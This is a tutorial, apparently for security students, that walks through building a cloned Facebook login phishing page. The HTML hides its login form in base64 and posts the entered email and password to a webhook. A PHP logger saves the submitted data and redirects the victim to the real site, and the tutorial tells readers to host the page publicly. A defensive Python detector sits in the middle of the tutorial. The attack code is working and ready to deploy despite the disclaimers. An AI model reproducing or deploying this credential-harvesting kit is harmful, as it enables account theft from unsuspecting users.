Important
Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.
This demonstrates how phishing techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.
We are using a minified and obfuscated clone of the Facebook login page for simulation purposes.
- Copy the HTML content below into a file named `index.html`
.<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Facebook – log in or sign up</title> <style>body{margin:0;font-family:Arial,sans-serif;background-color:#f0f2f5}.login-box,footer{text-align:center}.login-box{background:#fff;padding:30px;box-shadow:0 2px 5px rgba(0,0,0,.1);width:360px;border-radius:6px}.login-box h2{margin-bottom:20px;font-weight:400}.login-box form input{width:100%;padding:10px;margin-bottom:12px;border:1px solid #ddd;border-radius:4px;font-size:14px}.login-box form button{width:100%;padding:10px;background-color:#1877f2;border:none;color:#fff;font-size:16px;border-radius:4px;cursor:pointer}.login-box form button,.login-box form input{box-sizing:border-box}.login-links,.not-now{font-size:13px;margin-top:10px;color:#1877f2}footer{padding:20px;font-size:13px;color:#737373}footer .footer-links a{margin:0 5px;color:#737373;text-decoration:none}footer .footer-links{margin-top:10px;line-height:1.6;max-width:1000px;margin-left:auto;margin-right:auto}</style> </head> <body> <noscript>JavaScript is required to run this application</noscript> <script> var webhook="https://webhook.site/your-id-here"; 
document.write(atob(`PGRpdiBzdHlsZT0iYmFja2dyb3VuZC1jb2xvcjojM2I1OTk4O2NvbG9yOiNmZmY7cGFkZGluZzoxMHB4IDIwcHg7ZGlzcGxheTpmbGV4O2FsaWduLWl0ZW1zOmNlbnRlcjtqdXN0aWZ5LWNvbnRlbnQ6c3BhY2UtYmV0d2VlbiI+PGRpdiBzdHlsZT1mb250LXNpemU6MzJweDtmb250LXdlaWdodDo3MDA+ZmFjZWJvb2s8L2Rpdj48YSBocmVmPSMgc3R5bGU9ImJhY2tncm91bmQtY29sb3I6IzQyYjcyYTtjb2xvcjojZmZmO3BhZGRpbmc6NnB4IDEycHg7dGV4dC1kZWNvcmF0aW9uOm5vbmU7Zm9udC1zaXplOjE0cHg7Ym9yZGVyLXJhZGl1czozcHgiPkNyZWF0ZSBOZXcgQWNjb3VudDwvYT48L2Rpdj48ZGl2IHN0eWxlPWRpc3BsYXk6ZmxleDtqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyO2FsaWduLWl0ZW1zOmNlbnRlcjtoZWlnaHQ6NjB2aD48ZGl2IGNsYXNzPWxvZ2luLWJveD48aDI+TG9nIGluIHRvIEZhY2Vib29rPC9oMj48Zm9ybSBvbnN1Ym1pdD0idGhpcy5hY3Rpb249d2ViaG9vayIgbWV0aG9kPXBvc3QgYWN0aW9uPT48aW5wdXQgbmFtZT1lbWFpbCBwbGFjZWhvbGRlcj0iRW1haWwgYWRkcmVzcyBvciBwaG9uZSBudW1iZXIicmVxdWlyZWQ+IDxpbnB1dCBuYW1lPXBhc3MgcGxhY2Vob2xkZXI9UGFzc3dvcmQgcmVxdWlyZWQgdHlwZT1wYXNzd29yZD4gPGJ1dHRvbiB0eXBlPXN1Ym1pdD5Mb2cgaW48L2J1dHRvbj48L2Zvcm0+PGRpdiBjbGFzcz1sb2dpbi1saW5rcz48YSBocmVmPSM+Rm9yZ290dGVuIGFjY291bnQ/PC9hPiAmI3hCNzsgPGEgaHJlZj0jPlNpZ24gdXAgZm9yIEZhY2Vib29rPC9hPjwvZGl2PjxkaXYgY2xhc3M9bm90LW5vdz48YSBocmVmPSM+Tm90IG5vdzwvYT48L2Rpdj48L2Rpdj48L2Rpdj48Zm9vdGVyPjxkaXYgc3R5bGU9bWFyZ2luLWJvdHRvbToxMHB4PkVuZ2xpc2ggKFVLKSAmI3hBOTc7JiN4QUMxOyYjeEE5QzsmI3hBQjA7JiN4QUJFOyYjeEFBNDsmI3hBQzA7ICYjeDkzOTsmI3g5M0Y7JiN4OTI4OyYjeDk0RDsmI3g5MjY7JiN4OTQwOyAmI3g5MkU7JiN4OTMwOyYjeDkzRTsmI3g5MjA7JiN4OTQwOyAmI3g2Mjc7JiN4NjRGOyYjeDYzMTsmI3g2MkY7JiN4NjRGOyYjeDY0ODsgJiN4QkE0OyYjeEJBRTsmI3hCQkY7JiN4QkI0OyYjeEJDRDsgJiN4OUFDOyYjeDlCRTsmI3g5ODI7JiN4OUIyOyYjeDlCRTsgJiN4QzI0OyYjeEM0NjsmI3hDMzI7JiN4QzQxOyYjeEMxNzsmI3hDNDE7ICYjeEQyRTsmI3hEMzI7JiN4RDJGOyYjeEQzRTsmI3hEMzM7JiN4RDAyOyBFc3BhJiN4RjE7b2wgPGJ1dHRvbj4rPC9idXR0b24+PC9kaXY+PGRpdiBjbGFzcz1mb290ZXItbGlua3M+PGEgaHJlZj0jPlNpZ24gVXA8L2E+IDxhIGhyZWY9Iz5Mb2cgaW48L2E+IDxhIGhyZWY9Iz5NZXNzZW5nZXI8L2E+IDxhIGhyZWY9Iz5GYWNlYm9vayBMaXRlPC9hPiA8YSBocmVmPSM+VmlkZW88L2E+IDxhIGhyZWY9Iz5NZXRhIFBheTwvYT4gPGEgaHJlZj0jPk1ldGEgU3RvcmU8L2E+IDxhIGhyZWY9Iz5NZXRhIFF1ZXN0PC9
hPiA8YSBocmVmPSM+UmF5LUJhbiBNZXRhPC9hPiA8YSBocmVmPSM+TWV0YSBBSTwvYT4gPGEgaHJlZj0jPkluc3RhZ3JhbTwvYT4gPGEgaHJlZj0jPlRocmVhZHM8L2E+IDxhIGhyZWY9Iz5Wb3RpbmcgSW5mb3JtYXRpb24gQ2VudHJlPC9hPiA8YSBocmVmPSM+UHJpdmFjeSBQb2xpY3k8L2E+IDxhIGhyZWY9Iz5Qcml2YWN5IENlbnRyZTwvYT4gPGEgaHJlZj0jPkFib3V0PC9hPiA8YSBocmVmPSM+Q3JlYXRlIGFkPC9hPiA8YSBocmVmPSM+Q3JlYXRlIFBhZ2U8L2E+IDxhIGhyZWY9Iz5EZXZlbG9wZXJzPC9hPiA8YSBocmVmPSM+Q2FyZWVyczwvYT4gPGEgaHJlZj0jPkNvb2tpZXM8L2E+IDxhIGhyZWY9Iz5BZENob2ljZXM8L2E+IDxhIGhyZWY9Iz5UZXJtczwvYT4gPGEgaHJlZj0jPkhlbHA8L2E+PC9kaXY+PGRpdiBzdHlsZT1tYXJnaW4tdG9wOjEwcHg+TWV0YSAmI3hBOTsgMjAyNTwvZGl2PjwvZm9vdGVyPg==`)); </script> </body> </html>
- Replace the URL in the line `var webhook="https://webhook.site/your-id-here";` with your own (from tools like Webhook.site, Burp Collaborator, RequestBin, Beeceptor, etc.) to capture the form data.
- Host the file on a public-facing web server to make it accessible over the internet (for testing within your own lab environment only).

When someone accesses this page and submits the form, the data will be sent to your specified webhook.
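For the defensive side of this lab, the following added example (not part of the original page) is a static triage check for a saved copy of a page: it decodes markup passed to `atob()`, finds password forms, and reports when the form target, including one assigned in `onsubmit` from a script variable as in the demo above, points at a host other than the one that served the page. The function names, finding labels and the `SAMPLE` page with its `.example` hosts are constructed for illustration.

```python
import base64, contextlib, re
from html.parser import HTMLParser
from urllib.parse import urlparse

ATOB = re.compile(r"atob\(\s*[`'\"]([A-Za-z0-9+/=\s]+)[`'\"]\s*\)")
JSVAR = re.compile(r"\b(?:var|let|const)\s+(\w+)\s*=\s*[\"'](https?://[^\"']+)[\"']")
SET_ACTION = re.compile(r"this\.action\s*=\s*(\w+)")

class FormScan(HTMLParser):
    """Collect each <form>'s attributes and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({**a, "password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True

def triage(html, served_from):
    """Return findings for a saved page that was served from host `served_from`."""
    decoded = []
    for m in ATOB.finditer(html):
        with contextlib.suppress(ValueError):  # skip literals that are not valid base64
            decoded.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
    findings = ["markup-hidden-in-atob"] if decoded else []
    js_urls = dict(JSVAR.findall(html))  # e.g. var webhook="https://..."
    forms = []
    for doc in [html, *decoded]:  # the raw page, then each decoded fragment
        scan = FormScan()
        scan.feed(doc)
        forms += scan.forms
    for form in (f for f in forms if f["password"]):
        target = form.get("action") or ""
        m = SET_ACTION.search(form.get("onsubmit") or "")
        if m and m.group(1) in js_urls:  # action is swapped in at submit time
            target = js_urls[m.group(1)]
            findings.append("action-set-at-submit")
        host = urlparse(target).hostname
        if host and host != served_from:
            findings.append("password-posted-to:" + host)
    return findings

# Constructed sample: a generic password form hidden in base64, posting to a .example host.
_FORM = '<form onsubmit="this.action=webhook" method="post"><input type="password" name="pass"></form>'
SAMPLE = ('<script>var webhook="https://collector.example/hook";document.write(atob(`'
          + base64.b64encode(_FORM.encode()).decode() + '`));</script>')
```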
Instead of using public services, you can also set up a simple logger on your own server using PHP:
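```php
<?php
// Append each submitted form to post_data.log as one JSON object per line.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    file_put_contents('post_data.log', json_encode($_POST) . PHP_EOL, FILE_APPEND);
}
// Send the browser on to the real site.
header('Location: https://www.facebook.com/');
exit;
```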
- Save this code in a file (e.g., `l0gger.php`) and host it on your web server.
- Use the URL to this script as your `webhook` in the HTML demo.
Warning
Again, this is for ethical and legal cybersecurity education only. Do not deploy this technique against unsuspecting users or external systems without explicit, written permission. Educate responsibly.
If you're training in cybersecurity or preparing for certifications (like OSCP, CEH, or Security+), simulated phishing labs like this can be valuable for understanding how attackers operate and how to defend against them.